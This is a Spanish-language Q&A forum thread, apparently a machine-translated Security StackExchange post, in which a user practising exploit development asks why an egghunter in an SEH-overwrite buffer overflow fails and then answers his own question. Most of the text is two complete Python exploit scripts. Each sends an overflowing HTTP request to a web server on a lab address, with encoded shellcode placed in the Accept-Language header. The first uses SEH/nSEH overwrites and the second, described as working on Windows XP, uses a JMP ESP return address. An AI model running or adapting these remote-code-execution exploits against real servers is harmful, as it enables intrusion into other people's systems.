Necesita ayuda para omitir el Manejo estructurado de excepciones (SEH) + cazador de huevos

3

Practico el desarrollo de exploits e intento rehacer este exploit en el mismo entorno: enlace de explotación

Me enfrento a un problema que el cazador de huevos no está ejecutando. Incluso probé el de la vulnerabilidad y no funcionó. También ejecuté la explotación y no funcionó correctamente. Intenté usar la cazadora de huevos generada desde la herramienta egghunter.rb en el metasploit codificado con diferentes codificadores y no funcionó bien, luego probé otro cazador de huevos generado a partir del comando mona.py en el depurador de inmunidad y tampoco funcionó, aquí está el siguiente código:

import socket

ip='192.168.163.130'
port=80
#!mona seh
#6FC5447E   5E               POP POP RETN address
seh="\x7e\x44\xc5\x6f"
nseh="\xeb\xE0\x90\x90"
# short jmp back to run egghunter 
#Attempting to encode payload with 1 iterations of x86/alpha_mixed
#x86/alpha_mixed succeeded with size 727 (iteration=0)
#x86/alpha_mixed chosen with final size 727
#Payload size: 727 bytes

shellcode=("\x89\xe2\xdb\xd4\xd9\x72\xf4\x59\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x59"
"\x6c\x7a\x48\x4f\x72\x53\x30\x53\x30\x73\x30\x73\x50\x6d\x59"
"\x39\x75\x70\x31\x59\x50\x61\x74\x4c\x4b\x52\x70\x74\x70\x6c"
"\x4b\x61\x42\x74\x4c\x6e\x6b\x33\x62\x65\x44\x6c\x4b\x74\x32"
"\x71\x38\x74\x4f\x4c\x77\x30\x4a\x75\x76\x56\x51\x49\x6f\x6e"
"\x4c\x75\x6c\x30\x61\x33\x4c\x35\x52\x46\x4c\x77\x50\x79\x51"
"\x68\x4f\x56\x6d\x67\x71\x58\x47\x59\x72\x7a\x52\x36\x32\x53"
"\x67\x4c\x4b\x73\x62\x36\x70\x6c\x4b\x61\x5a\x67\x4c\x4c\x4b"
"\x52\x6c\x47\x61\x44\x38\x78\x63\x32\x68\x36\x61\x6e\x31\x46"
"\x31\x4e\x6b\x72\x79\x51\x30\x73\x31\x48\x53\x4e\x6b\x71\x59"
"\x45\x48\x4b\x53\x35\x6a\x70\x49\x6e\x6b\x36\x54\x6c\x4b\x67"
"\x71\x4e\x36\x45\x61\x59\x6f\x6e\x4c\x4a\x61\x6a\x6f\x66\x6d"
"\x53\x31\x39\x57\x76\x58\x49\x70\x50\x75\x5a\x56\x44\x43\x71"
"\x6d\x4b\x48\x65\x6b\x53\x4d\x34\x64\x61\x65\x6a\x44\x46\x38"
"\x4e\x6b\x73\x68\x67\x54\x33\x31\x58\x53\x73\x56\x6c\x4b\x66"
"\x6c\x70\x4b\x6e\x6b\x31\x48\x65\x4c\x46\x61\x6a\x73\x6e\x6b"
"\x57\x74\x6c\x4b\x75\x51\x68\x50\x6f\x79\x50\x44\x51\x34\x77"
"\x54\x73\x6b\x61\x4b\x43\x51\x52\x79\x73\x6a\x56\x31\x6b\x4f"
"\x6b\x50\x51\x4f\x61\x4f\x62\x7a\x4c\x4b\x64\x52\x68\x6b\x6c"
"\x4d\x63\x6d\x72\x48\x77\x43\x64\x72\x57\x70\x33\x30\x71\x78"
"\x50\x77\x53\x43\x44\x72\x53\x6f\x56\x34\x61\x78\x50\x4c\x64"
"\x37\x77\x56\x53\x37\x6b\x4f\x79\x45\x6d\x68\x6e\x70\x56\x61"
"\x33\x30\x33\x30\x75\x79\x69\x54\x63\x64\x76\x30\x65\x38\x64"
"\x69\x6b\x30\x52\x4b\x47\x70\x59\x6f\x4e\x35\x51\x7a\x76\x65"
"\x73\x58\x4f\x30\x79\x38\x6f\x53\x6b\x33\x73\x58\x55\x52\x77"
"\x70\x64\x51\x63\x6c\x4e\x69\x4b\x56\x32\x70\x72\x70\x30\x50"
"\x66\x30\x77\x30\x72\x70\x67\x30\x50\x50\x52\x48\x39\x7a\x56"
"\x6f\x49\x4f\x6b\x50\x69\x6f\x6a\x75\x4e\x77\x63\x5a\x36\x70"
"\x32\x76\x63\x67\x62\x48\x7a\x39\x6c\x65\x30\x74\x31\x71\x6b"
"\x4f\x4e\x35\x4b\x35\x49\x50\x52\x54\x65\x5a\x59\x6f\x30\x4e"
"\x67\x78\x43\x45\x5a\x4c\x6b\x58\x43\x51\x35\x50\x73\x30\x47"
"\x70\x62\x4a\x65\x50\x61\x7a\x37\x74\x76\x36\x32\x77\x55\x38"
"\x65\x52\x39\x49\x59\x58\x71\x4f\x69\x6f\x78\x55\x4b\x33\x4c"
"\x38\x43\x30\x63\x4e\x34\x76\x6c\x4b\x34\x76\x30\x6a\x53\x70"
"\x72\x48\x77\x70\x64\x50\x57\x70\x63\x30\x31\x46\x51\x7a\x75"
"\x50\x70\x68\x30\x58\x6f\x54\x72\x73\x5a\x45\x79\x6f\x6a\x75"
"\x4d\x43\x51\x43\x33\x5a\x43\x30\x71\x46\x33\x63\x36\x37\x31"
"\x78\x46\x62\x78\x59\x5a\x68\x33\x6f\x39\x6f\x68\x55\x4f\x73"
"\x58\x78\x47\x70\x73\x4d\x55\x72\x33\x68\x53\x58\x63\x30\x37"
"\x30\x73\x30\x65\x50\x51\x7a\x33\x30\x32\x70\x73\x58\x44\x4b"
"\x36\x4f\x34\x4f\x56\x50\x59\x6f\x7a\x75\x33\x67\x52\x48\x33"
"\x45\x50\x6e\x70\x4d\x75\x31\x59\x6f\x6a\x75\x53\x6e\x63\x6e"
"\x39\x6f\x34\x4c\x57\x54\x49\x79\x51\x61\x79\x6f\x4b\x4f\x49"
"\x6f\x65\x51\x59\x53\x67\x59\x78\x46\x74\x35\x4f\x37\x48\x43"
"\x4f\x4b\x6c\x30\x6e\x55\x4e\x42\x56\x36\x50\x6a\x53\x30\x42"
"\x73\x4b\x4f\x79\x45\x41\x41")
egghunter=(
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)
payload="A"*2248+egghunter+nseh+seh+"D"*(5005-2280-4-4-62)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
request=("GET / HTTP/1.1\r\n"
"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n"
"Accept-Language: "+"w00tw00t"+shellcode+"\r\n"
"Accept-Encoding: deflate, gzip\r\n"
"cookie: frmUserName=test; frmUserPass=pass; rememberPass=202%2C197%2C208%2C215%2C201; UserID=ID; PassWD=PassWD\r\n"
"Connection: "+payload+"\r\n\r\n")
s.send(request)
s.recv(1024)
s.close();

y aquí están las imágenes del depurador:

nota: como el desbordamiento de pila no me permite poner más de dos enlaces, pondré el resto de los enlaces de imágenes al final.

como se puede ver, todo en el exploit se está ejecutando bien, pero una vez que se inicia el funcionamiento del egghunter, se produce un error, edité mi código y recalculé la carga útil con otra generada por mona esta vez, y desafortunadamente, no funcionó, así que cualquiera puede ayudarme por favor para saber cuál es el problema?

por mi parte, creo que el problema es la infracción de acceso y que el cazador de huevos no puede leer la memoria. ¿Es posible solucionar este problema por favor?

enlace

enlace

enlace

enlace

enlace

    
pregunta HAlmusajjen 28.01.2017 - 20:05
fuente

1 respuesta

0

Encontré la solución, en primer lugar, el entorno correcto no es Windows 7, es Windows XP, no sé por qué no funciona el cazador de huevos en Windows 7, pero he probado el siguiente exploit y funciona perfectamente. en windows xp

import socket

ip='192.168.163.128'
port=80

#Payload size: 360 bytes
#bad charecters "\x00\x0a\x0d\x0e\xfe\x5c"
shellcode=(
"\xdb\xc9\xba\xbf\x25\xd3\xec\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x54\x83\xc6\x04\x31\x56\x14\x03\x56\xab\xc7\x26\x10\x3b\x85"
"\xc9\xe9\xbb\xea\x40\x0c\x8a\x2a\x36\x44\xbc\x9a\x3c\x08\x30"
"\x50\x10\xb9\xc3\x14\xbd\xce\x64\x92\x9b\xe1\x75\x8f\xd8\x60"
"\xf5\xd2\x0c\x43\xc4\x1c\x41\x82\x01\x40\xa8\xd6\xda\x0e\x1f"
"\xc7\x6f\x5a\x9c\x6c\x23\x4a\xa4\x91\xf3\x6d\x85\x07\x88\x37"
"\x05\xa9\x5d\x4c\x0c\xb1\x82\x69\xc6\x4a\x70\x05\xd9\x9a\x49"
"\xe6\x76\xe3\x66\x15\x86\x23\x40\xc6\xfd\x5d\xb3\x7b\x06\x9a"
"\xce\xa7\x83\x39\x68\x23\x33\xe6\x89\xe0\xa2\x6d\x85\x4d\xa0"
"\x2a\x89\x50\x65\x41\xb5\xd9\x88\x86\x3c\x99\xae\x02\x65\x79"
"\xce\x13\xc3\x2c\xef\x44\xac\x91\x55\x0e\x40\xc5\xe7\x4d\x0c"
"\x2a\xca\x6d\xcc\x24\x5d\x1d\xfe\xeb\xf5\x89\xb2\x64\xd0\x4e"
"\xb5\x5e\xa4\xc1\x48\x61\xd5\xc8\x8e\x35\x85\x62\x27\x36\x4e"
"\x73\xc8\xe3\xfb\x76\x5e\xcc\x54\xdb\x1d\xa4\xa6\x1c\x30\x69"
"\x2e\xfa\x62\xc1\x60\x53\xc2\xb1\xc0\x03\xaa\xdb\xce\x7c\xca"
"\xe3\x04\x15\x60\x0c\xf1\x4d\x1c\xb5\x58\x05\xbd\x3a\x77\x63"
"\xfd\xb1\x72\x93\xb3\x31\xf6\x87\xa3\x23\xf8\x57\x33\xce\xf8"
"\x3d\x37\x58\xae\xa9\x35\xbd\x98\x75\xc6\xe8\x9a\x72\x38\x6d"
"\xab\x09\x0e\xfb\x93\x65\x6e\xeb\x13\x76\x38\x61\x14\x1e\x9c"
"\xd1\x47\x3b\xe3\xcf\xfb\x90\x71\xf0\xad\x45\xd2\x98\x53\xb3"
"\x14\x07\xab\x96\x27\x40\x53\x64\x05\xe9\x3c\x96\x09\x09\xbd"
"\xfc\x89\x59\xd5\x0b\xa6\x56\x15\xf3\x6d\x3f\x3d\x7e\xe3\x8d"
"\xdc\x7f\x2e\x53\x41\x7f\xdc\x48\x94\x0e\x23\x6f\x99\xf0\x18"
"\xb9\xa0\x86\x59\x79\x97\x99\xd0\xdc\xbe\x33\x1a\x72\xc0\x11"
)
#size 32
egghunter=(
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)
#78196D4D   FFE4             JMP ESP
jmpESP="\x4d\x6d\x19\x78"
payload="A"*2048+jmpESP+egghunter+"D"*(2100-4-2048)

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
request=("GET / HTTP/1.1\r\n"
"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n"
"Accept-Language: "+"w00tw00t"+shellcode+"\r\n"
"Accept-Encoding: deflate, gzip\r\n"
"cookie: frmUserName=test; frmUserPass=pass; rememberPass=202%2C197%2C208%2C215%2C201; UserID=ID; PassWD=PassWD\r\n"
"Connection: "+payload+"\r\n\r\n")
s.send(request)
s.recv(1024)
s.close();

pero dime ahora que no sé cómo ejecutar el mismo exploit en Windows 7, ¿alguna ayuda, por favor?

    
respondido por el HAlmusajjen 29.01.2017 - 20:48
fuente

Lea otras preguntas en las etiquetas